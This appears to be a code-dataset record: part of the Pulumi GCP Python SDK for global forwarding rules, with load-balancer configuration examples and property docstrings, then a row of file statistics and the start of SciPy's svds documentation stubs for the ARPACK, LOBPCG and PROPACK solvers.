protocol="TCP",
port_name="tcp",
load_balancing_scheme="EXTERNAL",
timeout_sec=10,
health_checks=[default_health_check.id],
backends=[gcp.compute.BackendServiceBackendArgs(
group=default_instance_group_manager.instance_group,
balancing_mode="UTILIZATION",
max_utilization=1,
capacity_scaler=1,
)],
opts=pulumi.ResourceOptions(provider=google_beta))
default_target_tcp_proxy = gcp.compute.TargetTCPProxy("defaultTargetTCPProxy", backend_service=default_backend_service.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# forwarding rule
default_global_forwarding_rule = gcp.compute.GlobalForwardingRule("defaultGlobalForwardingRule",
ip_protocol="TCP",
load_balancing_scheme="EXTERNAL",
port_range="110",
target=default_target_tcp_proxy.id,
ip_address=default_global_address.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# allow access from health check ranges
default_firewall = gcp.compute.Firewall("defaultFirewall",
direction="INGRESS",
network=default_network.id,
source_ranges=[
"130.211.0.0/22",
"35.191.0.0/16",
],
allows=[gcp.compute.FirewallAllowArgs(
protocol="tcp",
)],
target_tags=["allow-health-check"],
opts=pulumi.ResourceOptions(provider=google_beta))
```
### External Http Lb Mig Backend Custom Header
```python
import pulumi
import pulumi_gcp as gcp
# External HTTP load balancer with a CDN-enabled managed instance group backend
# and custom request and response headers
# VPC
default_network = gcp.compute.Network("defaultNetwork", auto_create_subnetworks=False,
opts=pulumi.ResourceOptions(provider=google_beta))
# backend subnet
default_subnetwork = gcp.compute.Subnetwork("defaultSubnetwork",
ip_cidr_range="10.0.1.0/24",
region="us-central1",
network=default_network.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# reserved IP address
default_global_address = gcp.compute.GlobalAddress("defaultGlobalAddress", opts=pulumi.ResourceOptions(provider=google_beta))
# health check
default_health_check = gcp.compute.HealthCheck("defaultHealthCheck", http_health_check=gcp.compute.HealthCheckHttpHealthCheckArgs(
port_specification="USE_SERVING_PORT",
),
opts=pulumi.ResourceOptions(provider=google_beta))
# instance template
default_instance_template = gcp.compute.InstanceTemplate("defaultInstanceTemplate",
machine_type="e2-small",
tags=["allow-health-check"],
network_interfaces=[gcp.compute.InstanceTemplateNetworkInterfaceArgs(
network=default_network.id,
subnetwork=default_subnetwork.id,
access_configs=[gcp.compute.InstanceTemplateNetworkInterfaceAccessConfigArgs()],
)],
disks=[gcp.compute.InstanceTemplateDiskArgs(
source_image="debian-cloud/debian-10",
auto_delete=True,
boot=True,
)],
metadata={
"startup-script": \"\"\"#! /bin/bash
set -euo pipefail
export DEBIAN_FRONTEND=noninteractive
apt-get update
apt-get install -y nginx-light jq
NAME=$(curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/hostname")
IP=$(curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/0/ip")
METADATA=$(curl -f -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=True" | jq 'del(.["startup-script"])')
cat <<EOF > /var/www/html/index.html
<pre>
Name: $NAME
IP: $IP
Metadata: $METADATA
</pre>
EOF
\"\"\",
},
opts=pulumi.ResourceOptions(provider=google_beta))
# MIG
default_instance_group_manager = gcp.compute.InstanceGroupManager("defaultInstanceGroupManager",
zone="us-central1-c",
named_ports=[gcp.compute.InstanceGroupManagerNamedPortArgs(
name="http",
port=8080,
)],
versions=[gcp.compute.InstanceGroupManagerVersionArgs(
instance_template=default_instance_template.id,
name="primary",
)],
base_instance_name="vm",
target_size=2,
opts=pulumi.ResourceOptions(provider=google_beta))
# backend service with custom request and response headers
default_backend_service = gcp.compute.BackendService("defaultBackendService",
protocol="HTTP",
port_name="my-port",
load_balancing_scheme="EXTERNAL",
timeout_sec=10,
enable_cdn=True,
custom_request_headers=["X-Client-Geo-Location: {client_region_subdivision}, {client_city}"],
custom_response_headers=["X-Cache-Hit: {cdn_cache_status}"],
health_checks=[default_health_check.id],
backends=[gcp.compute.BackendServiceBackendArgs(
group=default_instance_group_manager.instance_group,
balancing_mode="UTILIZATION",
capacity_scaler=1,
)],
opts=pulumi.ResourceOptions(provider=google_beta))
# url map
default_url_map = gcp.compute.URLMap("defaultURLMap", default_service=default_backend_service.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# http proxy
default_target_http_proxy = gcp.compute.TargetHttpProxy("defaultTargetHttpProxy", url_map=default_url_map.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# forwarding rule
default_global_forwarding_rule = gcp.compute.GlobalForwardingRule("defaultGlobalForwardingRule",
ip_protocol="TCP",
load_balancing_scheme="EXTERNAL",
port_range="80",
target=default_target_http_proxy.id,
ip_address=default_global_address.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# allow access from health check ranges
default_firewall = gcp.compute.Firewall("defaultFirewall",
direction="INGRESS",
network=default_network.id,
source_ranges=[
"130.211.0.0/22",
"35.191.0.0/16",
],
allows=[gcp.compute.FirewallAllowArgs(
protocol="tcp",
)],
target_tags=["allow-health-check"],
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Global Forwarding Rule Http
```python
import pulumi
import pulumi_gcp as gcp
default_http_health_check = gcp.compute.HttpHealthCheck("defaultHttpHealthCheck",
request_path="/",
check_interval_sec=1,
timeout_sec=1)
default_backend_service = gcp.compute.BackendService("defaultBackendService",
port_name="http",
protocol="HTTP",
timeout_sec=10,
health_checks=[default_http_health_check.id])
default_url_map = gcp.compute.URLMap("defaultURLMap",
description="a description",
default_service=default_backend_service.id,
host_rules=[gcp.compute.URLMapHostRuleArgs(
hosts=["mysite.com"],
path_matcher="allpaths",
)],
path_matchers=[gcp.compute.URLMapPathMatcherArgs(
name="allpaths",
default_service=default_backend_service.id,
path_rules=[gcp.compute.URLMapPathMatcherPathRuleArgs(
paths=["/*"],
service=default_backend_service.id,
)],
)])
default_target_http_proxy = gcp.compute.TargetHttpProxy("defaultTargetHttpProxy",
description="a description",
url_map=default_url_map.id)
default_global_forwarding_rule = gcp.compute.GlobalForwardingRule("defaultGlobalForwardingRule",
target=default_target_http_proxy.id,
port_range="80")
```
### Global Forwarding Rule Internal
```python
import pulumi
import pulumi_gcp as gcp
debian_image = gcp.compute.get_image(family="debian-9",
project="debian-cloud")
instance_template = gcp.compute.InstanceTemplate("instanceTemplate",
machine_type="e2-medium",
network_interfaces=[gcp.compute.InstanceTemplateNetworkInterfaceArgs(
network="default",
)],
disks=[gcp.compute.InstanceTemplateDiskArgs(
source_image=debian_image.self_link,
auto_delete=True,
boot=True,
)],
opts=pulumi.ResourceOptions(provider=google_beta))
igm = gcp.compute.InstanceGroupManager("igm",
versions=[gcp.compute.InstanceGroupManagerVersionArgs(
instance_template=instance_template.id,
name="primary",
)],
base_instance_name="internal-glb",
zone="us-central1-f",
target_size=1,
opts=pulumi.ResourceOptions(provider=google_beta))
default_health_check = gcp.compute.HealthCheck("defaultHealthCheck",
check_interval_sec=1,
timeout_sec=1,
tcp_health_check=gcp.compute.HealthCheckTcpHealthCheckArgs(
port=80,
),
opts=pulumi.ResourceOptions(provider=google_beta))
default_backend_service = gcp.compute.BackendService("defaultBackendService",
port_name="http",
protocol="HTTP",
timeout_sec=10,
load_balancing_scheme="INTERNAL_SELF_MANAGED",
backends=[gcp.compute.BackendServiceBackendArgs(
group=igm.instance_group,
balancing_mode="RATE",
capacity_scaler=0.4,
max_rate_per_instance=50,
)],
health_checks=[default_health_check.id],
opts=pulumi.ResourceOptions(provider=google_beta))
default_url_map = gcp.compute.URLMap("defaultURLMap",
description="a description",
default_service=default_backend_service.id,
host_rules=[gcp.compute.URLMapHostRuleArgs(
hosts=["mysite.com"],
path_matcher="allpaths",
)],
path_matchers=[gcp.compute.URLMapPathMatcherArgs(
name="allpaths",
default_service=default_backend_service.id,
path_rules=[gcp.compute.URLMapPathMatcherPathRuleArgs(
paths=["/*"],
service=default_backend_service.id,
)],
)],
opts=pulumi.ResourceOptions(provider=google_beta))
default_target_http_proxy = gcp.compute.TargetHttpProxy("defaultTargetHttpProxy",
description="a description",
url_map=default_url_map.id,
opts=pulumi.ResourceOptions(provider=google_beta))
default_global_forwarding_rule = gcp.compute.GlobalForwardingRule("defaultGlobalForwardingRule",
target=default_target_http_proxy.id,
port_range="80",
load_balancing_scheme="INTERNAL_SELF_MANAGED",
ip_address="0.0.0.0",
metadata_filters=[gcp.compute.GlobalForwardingRuleMetadataFilterArgs(
filter_match_criteria="MATCH_ANY",
filter_labels=[gcp.compute.GlobalForwardingRuleMetadataFilterFilterLabelArgs(
name="PLANET",
value="MARS",
)],
)],
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Private Service Connect Google Apis
```python
import pulumi
import pulumi_gcp as gcp
network = gcp.compute.Network("network",
project="my-project-name",
auto_create_subnetworks=False,
opts=pulumi.ResourceOptions(provider=google_beta))
vpc_subnetwork = gcp.compute.Subnetwork("vpcSubnetwork",
project=network.project,
ip_cidr_range="10.2.0.0/16",
region="us-central1",
network=network.id,
private_ip_google_access=True,
opts=pulumi.ResourceOptions(provider=google_beta))
default_global_address = gcp.compute.GlobalAddress("defaultGlobalAddress",
project=network.project,
address_type="INTERNAL",
purpose="PRIVATE_SERVICE_CONNECT",
network=network.id,
address="100.100.100.106",
opts=pulumi.ResourceOptions(provider=google_beta))
default_global_forwarding_rule = gcp.compute.GlobalForwardingRule("defaultGlobalForwardingRule",
project=network.project,
target="all-apis",
network=network.id,
ip_address=default_global_address.id,
load_balancing_scheme="",
opts=pulumi.ResourceOptions(provider=google_beta))
```
## Import
GlobalForwardingRule can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/globalForwardingRule:GlobalForwardingRule default projects/{{project}}/global/forwardingRules/{{name}}
```
```sh
$ pulumi import gcp:compute/globalForwardingRule:GlobalForwardingRule default {{project}}/{{name}}
```
```sh
$ pulumi import gcp:compute/globalForwardingRule:GlobalForwardingRule default {{name}}
```
:param str resource_name: The name of the resource.
:param GlobalForwardingRuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
    # Split the caller's positional/keyword arguments into an optional typed
    # args object plus resource options, then delegate to the real initializer.
    parsed_args, parsed_opts = _utilities.get_resource_args_opts(
        GlobalForwardingRuleArgs, pulumi.ResourceOptions, *args, **kwargs)
    if parsed_args is None:
        # No args object was recognized: forward the raw arguments unchanged.
        __self__._internal_init(resource_name, *args, **kwargs)
    else:
        __self__._internal_init(resource_name, parsed_opts, **parsed_args.__dict__)
def _internal_init(__self__,
                   resource_name: str,
                   opts: Optional[pulumi.ResourceOptions] = None,
                   description: Optional[pulumi.Input[str]] = None,
                   ip_address: Optional[pulumi.Input[str]] = None,
                   ip_protocol: Optional[pulumi.Input[str]] = None,
                   ip_version: Optional[pulumi.Input[str]] = None,
                   labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                   load_balancing_scheme: Optional[pulumi.Input[str]] = None,
                   metadata_filters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['GlobalForwardingRuleMetadataFilterArgs']]]]] = None,
                   name: Optional[pulumi.Input[str]] = None,
                   network: Optional[pulumi.Input[str]] = None,
                   port_range: Optional[pulumi.Input[str]] = None,
                   project: Optional[pulumi.Input[str]] = None,
                   target: Optional[pulumi.Input[str]] = None,
                   __props__=None):
    # Real initializer behind __init__: validates options, builds the resource
    # property bag, and registers the resource with the Pulumi engine.
    if opts is None:
        opts = pulumi.ResourceOptions()
    if not isinstance(opts, pulumi.ResourceOptions):
        raise TypeError('Expected resource options to be a ResourceOptions instance')
    if opts.version is None:
        # Pin the provider plugin version when the caller did not choose one.
        opts.version = _utilities.get_version()
    if opts.id is None:
        # No id means we are creating a new resource; __props__ is reserved
        # for the get() path, which looks up an existing resource by id.
        if __props__ is not None:
            raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
        __props__ = GlobalForwardingRuleArgs.__new__(GlobalForwardingRuleArgs)
        __props__.__dict__["description"] = description
        __props__.__dict__["ip_address"] = ip_address
        __props__.__dict__["ip_protocol"] = ip_protocol
        __props__.__dict__["ip_version"] = ip_version
        __props__.__dict__["labels"] = labels
        __props__.__dict__["load_balancing_scheme"] = load_balancing_scheme
        __props__.__dict__["metadata_filters"] = metadata_filters
        __props__.__dict__["name"] = name
        __props__.__dict__["network"] = network
        __props__.__dict__["port_range"] = port_range
        __props__.__dict__["project"] = project
        # 'target' is the only required input (unless adopting via opts.urn).
        if target is None and not opts.urn:
            raise TypeError("Missing required property 'target'")
        __props__.__dict__["target"] = target
        # Output-only properties start as None and are resolved by the engine.
        __props__.__dict__["label_fingerprint"] = None
        __props__.__dict__["self_link"] = None
    super(GlobalForwardingRule, __self__).__init__(
        'gcp:compute/globalForwardingRule:GlobalForwardingRule',
        resource_name,
        __props__,
        opts)
@staticmethod
def get(resource_name: str,
        id: pulumi.Input[str],
        opts: Optional[pulumi.ResourceOptions] = None,
        description: Optional[pulumi.Input[str]] = None,
        ip_address: Optional[pulumi.Input[str]] = None,
        ip_protocol: Optional[pulumi.Input[str]] = None,
        ip_version: Optional[pulumi.Input[str]] = None,
        label_fingerprint: Optional[pulumi.Input[str]] = None,
        labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
        load_balancing_scheme: Optional[pulumi.Input[str]] = None,
        metadata_filters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['GlobalForwardingRuleMetadataFilterArgs']]]]] = None,
        name: Optional[pulumi.Input[str]] = None,
        network: Optional[pulumi.Input[str]] = None,
        port_range: Optional[pulumi.Input[str]] = None,
        project: Optional[pulumi.Input[str]] = None,
        self_link: Optional[pulumi.Input[str]] = None,
        target: Optional[pulumi.Input[str]] = None) -> 'GlobalForwardingRule':
    """
    Look up an existing GlobalForwardingRule and rehydrate it from provider
    state, optionally seeding individual state properties.

    :param str resource_name: The unique name of the resulting resource.
    :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
    :param pulumi.ResourceOptions opts: Options for the resource.

    The remaining keyword arguments pre-populate the corresponding state
    fields; each has the same meaning as the matching resource property
    (see the property getters on this class): `description`, `ip_address`,
    `ip_protocol` (`TCP`, `UDP`, `ESP`, `AH`, `SCTP`, `ICMP`), `ip_version`
    (`IPV4`/`IPV6`), `label_fingerprint` (internal, used during label
    updates), `labels`, `load_balancing_scheme` (`EXTERNAL` by default or
    `INTERNAL_SELF_MANAGED`; must be "" for a PRIVATE_SERVICE_CONNECT
    global address with addressType INTERNAL), `metadata_filters` (xDS
    routing restrictions; INTERNAL_SELF_MANAGED only), `name`, `network`
    (INTERNAL_SELF_MANAGED only), `port_range`, `project`, `self_link`
    (URI of the created resource), and `target` (URL of the resource that
    receives the matched traffic; only "all-apis"/"vpc-sc" are valid for
    Private Service Connect).
    """
    # Attach the provider ID so the engine reads existing state rather than
    # creating a new resource.
    opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
    state = _GlobalForwardingRuleState.__new__(_GlobalForwardingRuleState)
    # Fill the state bag directly, bypassing the args-class constructor.
    for key, value in (
            ("description", description),
            ("ip_address", ip_address),
            ("ip_protocol", ip_protocol),
            ("ip_version", ip_version),
            ("label_fingerprint", label_fingerprint),
            ("labels", labels),
            ("load_balancing_scheme", load_balancing_scheme),
            ("metadata_filters", metadata_filters),
            ("name", name),
            ("network", network),
            ("port_range", port_range),
            ("project", project),
            ("self_link", self_link),
            ("target", target)):
        state.__dict__[key] = value
    return GlobalForwardingRule(resource_name, opts=opts, __props__=state)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
    """Optional human-readable description supplied when the resource was created."""
    return pulumi.get(self, "description")
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> pulumi.Output[str]:
    """
    IP address served by this forwarding rule; traffic sent to it is
    directed to the rule's target. The loadBalancingScheme and target
    determine which address types are usable (see the GCP IP address
    specifications for forwarding rules). May be a literal IP or a
    reference to an existing Address resource; an ephemeral address is
    assigned when no reserved one is specified. Must be 0.0.0.0 when the
    target is a targetGrpcProxy with validateForProxyless set to true, and
    must be provided for Private Service Connect rules that forward to
    Google APIs.
    """
    return pulumi.get(self, "ip_address")
@property
@pulumi.getter(name="ipProtocol")
def ip_protocol(self) -> pulumi.Output[str]:
    """
    IP protocol this rule applies to; one of `TCP`, `UDP`, `ESP`, `AH`,
    `SCTP`, or `ICMP`. Only TCP is valid with the INTERNAL_SELF_MANAGED
    scheme, and the field must not be set when the global address is
    configured with purpose PRIVATE_SERVICE_CONNECT and addressType
    INTERNAL.
    """
    return pulumi.get(self, "ip_protocol")
@property
@pulumi.getter(name="ipVersion")
def ip_version(self) -> pulumi.Output[Optional[str]]:
    """IP version used by this global forwarding rule: `IPV4` or `IPV6`."""
    return pulumi.get(self, "ip_version")
@property
@pulumi.getter(name="labelFingerprint")
def label_fingerprint(self) -> pulumi.Output[str]:
    """Fingerprint used internally during label updates."""
    return pulumi.get(self, "label_fingerprint")
@property
@pulumi.getter
def labels(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
    """Key/value label pairs applied to this forwarding rule."""
    return pulumi.get(self, "labels")
@property
@pulumi.getter(name="loadBalancingScheme")
def load_balancing_scheme(self) -> pulumi.Output[Optional[str]]:
    """
    What this GlobalForwardingRule is used for. `INTERNAL_SELF_MANAGED`
    means internal global HTTP(S) load balancing; `EXTERNAL` (the default)
    means external global load balancing (HTTP(S) LB, external TCP/UDP LB,
    SSL proxy). Must be set to "" when the global address is configured
    with purpose PRIVATE_SERVICE_CONNECT and addressType INTERNAL.
    Possible values are `EXTERNAL` and `INTERNAL_SELF_MANAGED`.
    """
    return pulumi.get(self, "load_balancing_scheme")
@property
@pulumi.getter(name="metadataFilters")
def metadata_filters(self) -> pulumi.Output[Optional[Sequence['outputs.GlobalForwardingRuleMetadataFilter']]]:
    """
    Opaque filter criteria the load balancer uses to restrict this routing
    configuration to a limited set of xDS-compliant clients, matched
    against the node metadata those clients present. For each entry, a
    filterMatchCriteria of MATCH_ANY requires at least one filterLabel to
    match the metadata, while MATCH_ALL requires every filterLabel to
    match. Filters given here can be overridden by those specified in the
    UrlMap this rule references, and only apply to load balancers whose
    loadBalancingScheme is INTERNAL_SELF_MANAGED.
    Structure is documented below.
    """
    return pulumi.get(self, "metadata_filters")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
    """Name of the metadata label, between 1 and 1024 characters inclusive."""
    return pulumi.get(self, "name")
@property
@pulumi.getter
def network(self) -> pulumi.Output[str]:
    """
    Network the load-balanced IP should belong to, for INTERNAL_SELF_MANAGED
    load balancing only (unused for external load balancing). The default
    network is used when this field is not specified.
    """
    return pulumi.get(self, "network")
@property
@pulumi.getter(name="portRange")
def port_range(self) -> pulumi.Output[Optional[str]]:
    """
    Port range, used together with `target` for TargetHttpProxy,
    TargetHttpsProxy, TargetSslProxy, TargetTcpProxy, TargetVpnGateway,
    TargetPool and TargetInstance. Applicable only when IPProtocol is TCP,
    UDP, or SCTP; only packets addressed to ports in the range are
    forwarded, and rules sharing an [IPAddress, IPProtocol] pair must use
    disjoint ranges. Acceptable ports by target type:
    * TargetHttpProxy: 80, 8080
    * TargetHttpsProxy: 443
    * TargetTcpProxy / TargetSslProxy: 25, 43, 110, 143, 195, 443, 465,
      587, 700, 993, 995, 1883, 5222
    * TargetVpnGateway: 500, 4500
    """
    return pulumi.get(self, "port_range")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
    """ID of the project the resource belongs to; the provider project is used when omitted."""
    return pulumi.get(self, "project")
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> pulumi.Output[str]:
    """URI of the created resource."""
    return pulumi.get(self, "self_link")
@property
@pulumi.getter
def target(self) -> pulumi.Output[str]:
    """
    URL of the target resource that receives the matched traffic; the
    forwarded traffic must be of a type appropriate to that target. Only
    HTTP and HTTPS targets are valid for INTERNAL_SELF_MANAGED load
    balancing, and only "all-apis" and "vpc-sc" are valid for a global
    address with purpose PRIVATE_SERVICE_CONNECT and addressType INTERNAL.
    """
    return pulumi.get(self, "target")
| 49.540161
| 193
| 0.643154
| 11,045
| 98,684
| 5.605432
| 0.047623
| 0.035179
| 0.035502
| 0.033758
| 0.964094
| 0.958183
| 0.952368
| 0.949929
| 0.948314
| 0.938913
| 0
| 0.014253
| 0.276225
| 98,684
| 1,991
| 194
| 49.565043
| 0.852559
| 0.66716
| 0
| 0.81448
| 1
| 0
| 0.101532
| 0.030273
| 0
| 0
| 0
| 0
| 0
| 1
| 0.165158
| false
| 0.002262
| 0.015837
| 0
| 0.280543
| 0.033937
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b641d567e2496bd4306beeb12c476846dd5c8c9e
| 15,522
|
py
|
Python
|
scipy/sparse/linalg/eigen/_svds_doc.py
|
dhruv9vats/scipy
|
48e1dd7e604df3ae57d104b407c5b7a2a6a3247d
|
[
"BSD-3-Clause"
] | null | null | null |
scipy/sparse/linalg/eigen/_svds_doc.py
|
dhruv9vats/scipy
|
48e1dd7e604df3ae57d104b407c5b7a2a6a3247d
|
[
"BSD-3-Clause"
] | null | null | null |
scipy/sparse/linalg/eigen/_svds_doc.py
|
dhruv9vats/scipy
|
48e1dd7e604df3ae57d104b407c5b7a2a6a3247d
|
[
"BSD-3-Clause"
] | null | null | null |
def _svds_arpack_doc(A, k=6, ncv=None, tol=0, which='LM', v0=None,
maxiter=None, return_singular_vectors=True,
solver='arpack', random_state=None):
"""
Partial singular value decomposition of a sparse matrix using ARPACK.
Compute the largest or smallest `k` singular values and corresponding
singular vectors of a sparse matrix `A`. The order in which the singular
values are returned is not guaranteed.
In the descriptions below, let ``M, N = A.shape``.
Parameters
----------
A : sparse matrix or LinearOperator
Matrix to decompose.
k : int, optional
Number of singular values and singular vectors to compute.
Must satisfy ``1 <= k <= min(M, N) - 1``.
Default is 6.
ncv : int, optional
The number of Lanczos vectors generated.
The default is ``min(n, max(2*k + 1, 20))``.
If specified, must satistify ``k + 1 < ncv < min(M, N)``; ``ncv > 2*k``
is recommended.
tol : float, optional
Tolerance for singular values. Zero (default) means machine precision.
which : {'LM', 'SM'}
Which `k` singular values to find: either the largest magnitude ('LM')
or smallest magnitude ('SM') singular values.
v0 : ndarray, optional
The starting vector for iteration:
an (approximate) left singular vector if ``N > M`` and a right singular
vector otherwise. Must be of length ``min(M, N)``.
Default: random
maxiter : int, optional
Maximum number of Arnoldi update iterations allowed;
default is ``min(M, N) * 10``.
return_singular_vectors : {True, False, "u", "vh"}
Singular values are always computed and returned; this parameter
controls the computation and return of singular vectors.
- ``True``: return singular vectors.
- ``False``: do not return singular vectors.
- ``"u"``: if ``M <= N``, compute only the left singular vectors and
return ``None`` for the right singular vectors. Otherwise, compute
all singular vectors.
- ``"vh"``: if ``M > N``, compute only the right singular vectors and
return ``None`` for the left singular vectors. Otherwise, compute
all singular vectors.
solver : {'arpack', 'propack', 'lobpcg'}, optional
This is the solver-specific documentation for ``solver='arpack'``.
:ref:`'lobpcg' <sparse.linalg.svds-lobpcg>` and
:ref:`'propack' <sparse.linalg.svds-propack>`
are also supported.
random_state : {None, int, `numpy.random.Generator`,
`numpy.random.RandomState`}, optional
Pseudorandom number generator state used to generate resamples.
If `random_state` is ``None`` (or `np.random`), the
`numpy.random.RandomState` singleton is used.
If `random_state` is an int, a new ``RandomState`` instance is used,
seeded with `random_state`.
If `random_state` is already a ``Generator`` or ``RandomState``
instance then that instance is used.
options : dict, optional
A dictionary of solver-specific options. No solver-specific options
are currently supported; this parameter is reserved for future use.
Returns
-------
u : ndarray, shape=(M, k)
Unitary matrix having left singular vectors as columns.
s : ndarray, shape=(k,)
The singular values.
vh : ndarray, shape=(k, N)
Unitary matrix having right singular vectors as rows.
Notes
-----
This is a naive implementation using ARPACK as an eigensolver
on ``A.conj().T @ A`` or ``A @ A.conj().T``, depending on which one is more
efficient.
Examples
--------
Construct a matrix ``A`` from singular values and vectors.
>>> from scipy.stats import ortho_group
>>> from scipy.sparse import csc_matrix, diags
>>> from scipy.sparse.linalg import svds
>>> rng = np.random.default_rng()
>>> orthogonal = csc_matrix(ortho_group.rvs(10, random_state=rng))
>>> s = [0.0001, 0.001, 3, 4, 5] # singular values
>>> u = orthogonal[:, :5] # left singular vectors
>>> vT = orthogonal[:, 5:].T # right singular vectors
>>> A = u @ diags(s) @ vT
With only three singular values/vectors, the SVD approximates the original
matrix.
>>> u2, s2, vT2 = svds(A, k=3, solver='arpack')
>>> A2 = u2 @ np.diag(s2) @ vT2
>>> np.allclose(A2, A.todense(), atol=1e-3)
True
With all five singular values/vectors, we can reproduce the original
matrix.
>>> u3, s3, vT3 = svds(A, k=5, solver='arpack')
>>> A3 = u3 @ np.diag(s3) @ vT3
>>> np.allclose(A3, A.todense())
True
The singular values match the expected singular values, and the singular
vectors are as expected up to a difference in sign.
>>> (np.allclose(s3, s) and
... np.allclose(np.abs(u3), np.abs(u.todense())) and
... np.allclose(np.abs(vT3), np.abs(vT.todense())))
True
The singular vectors are also orthogonal.
>>> (np.allclose(u3.T @ u3, np.eye(5)) and
... np.allclose(vT3 @ vT3.T, np.eye(5)))
True
"""
pass
def _svds_lobpcg_doc(A, k=6, ncv=None, tol=0, which='LM', v0=None,
                     maxiter=None, return_singular_vectors=True,
                     solver='lobpcg', random_state=None):
    """
    Partial singular value decomposition of a sparse matrix using LOBPCG.

    Compute the largest or smallest `k` singular values and corresponding
    singular vectors of a sparse matrix `A`. The order in which the singular
    values are returned is not guaranteed.

    In the descriptions below, let ``M, N = A.shape``.

    Parameters
    ----------
    A : sparse matrix or LinearOperator
        Matrix to decompose.
    k : int, default: 6
        Number of singular values and singular vectors to compute.
        Must satisfy ``1 <= k <= min(M, N) - 1``.
    ncv : int, optional
        Ignored.
    tol : float, optional
        Tolerance for singular values. Zero (default) means machine precision.
    which : {'LM', 'SM'}
        Which `k` singular values to find: either the largest magnitude ('LM')
        or smallest magnitude ('SM') singular values.
    v0 : ndarray, optional
        If `k` is 1, the starting vector for iteration:
        an (approximate) left singular vector if ``N > M`` and a right singular
        vector otherwise. Must be of length ``min(M, N)``.
        Ignored otherwise.
        Default: random
    maxiter : int, default: 20
        Maximum number of iterations.
    return_singular_vectors : {True, False, "u", "vh"}
        Singular values are always computed and returned; this parameter
        controls the computation and return of singular vectors.

        - ``True``: return singular vectors.
        - ``False``: do not return singular vectors.
        - ``"u"``: if ``M <= N``, compute only the left singular vectors and
          return ``None`` for the right singular vectors. Otherwise, compute
          all singular vectors.
        - ``"vh"``: if ``M > N``, compute only the right singular vectors and
          return ``None`` for the left singular vectors. Otherwise, compute
          all singular vectors.

    solver : {'arpack', 'propack', 'lobpcg'}, optional
        This is the solver-specific documentation for ``solver='lobpcg'``.
        :ref:`'arpack' <sparse.linalg.svds-arpack>` and
        :ref:`'propack' <sparse.linalg.svds-propack>`
        are also supported.
    random_state : {None, int, `numpy.random.Generator`,
                    `numpy.random.RandomState`}, optional

        Pseudorandom number generator state used to generate resamples.

        If `random_state` is ``None`` (or `np.random`), the
        `numpy.random.RandomState` singleton is used.
        If `random_state` is an int, a new ``RandomState`` instance is used,
        seeded with `random_state`.
        If `random_state` is already a ``Generator`` or ``RandomState``
        instance then that instance is used.
    options : dict, optional
        A dictionary of solver-specific options. No solver-specific options
        are currently supported; this parameter is reserved for future use.

    Returns
    -------
    u : ndarray, shape=(M, k)
        Unitary matrix having left singular vectors as columns.
    s : ndarray, shape=(k,)
        The singular values.
    vh : ndarray, shape=(k, N)
        Unitary matrix having right singular vectors as rows.

    Notes
    -----
    This is a naive implementation using LOBPCG as an eigensolver
    on ``A.conj().T @ A`` or ``A @ A.conj().T``, depending on which one is more
    efficient.

    Examples
    --------
    Construct a matrix ``A`` from singular values and vectors.

    >>> from scipy.stats import ortho_group
    >>> from scipy.sparse import csc_matrix, diags
    >>> from scipy.sparse.linalg import svds
    >>> rng = np.random.default_rng()
    >>> orthogonal = csc_matrix(ortho_group.rvs(10, random_state=rng))
    >>> s = [0.0001, 0.001, 3, 4, 5]  # singular values
    >>> u = orthogonal[:, :5]         # left singular vectors
    >>> vT = orthogonal[:, 5:].T      # right singular vectors
    >>> A = u @ diags(s) @ vT

    With only three singular values/vectors, the SVD approximates the original
    matrix.

    >>> u2, s2, vT2 = svds(A, k=3, solver='lobpcg')
    >>> A2 = u2 @ np.diag(s2) @ vT2
    >>> np.allclose(A2, A.todense(), atol=1e-3)
    True

    With all five singular values/vectors, we can reproduce the original
    matrix.

    >>> u3, s3, vT3 = svds(A, k=5, solver='lobpcg')
    >>> A3 = u3 @ np.diag(s3) @ vT3
    >>> np.allclose(A3, A.todense())
    True

    The singular values match the expected singular values, and the singular
    vectors are as expected up to a difference in sign.

    >>> (np.allclose(s3, s) and
    ...  np.allclose(np.abs(u3), np.abs(u.todense())) and
    ...  np.allclose(np.abs(vT3), np.abs(vT.todense())))
    True

    The singular vectors are also orthogonal.

    >>> (np.allclose(u3.T @ u3, np.eye(5)) and
    ...  np.allclose(vT3 @ vT3.T, np.eye(5)))
    True
    """
    # NOTE(review): appears to be a documentation-only stub that hosts the
    # solver-specific docstring for svds(..., solver='lobpcg'); the actual
    # computation presumably lives elsewhere — confirm against svds dispatch.
    pass
def _svds_propack_doc(A, k=6, ncv=None, tol=0, which='LM', v0=None,
                      maxiter=None, return_singular_vectors=True,
                      solver='propack', random_state=None):
    """
    Partial singular value decomposition of a sparse matrix using PROPACK.

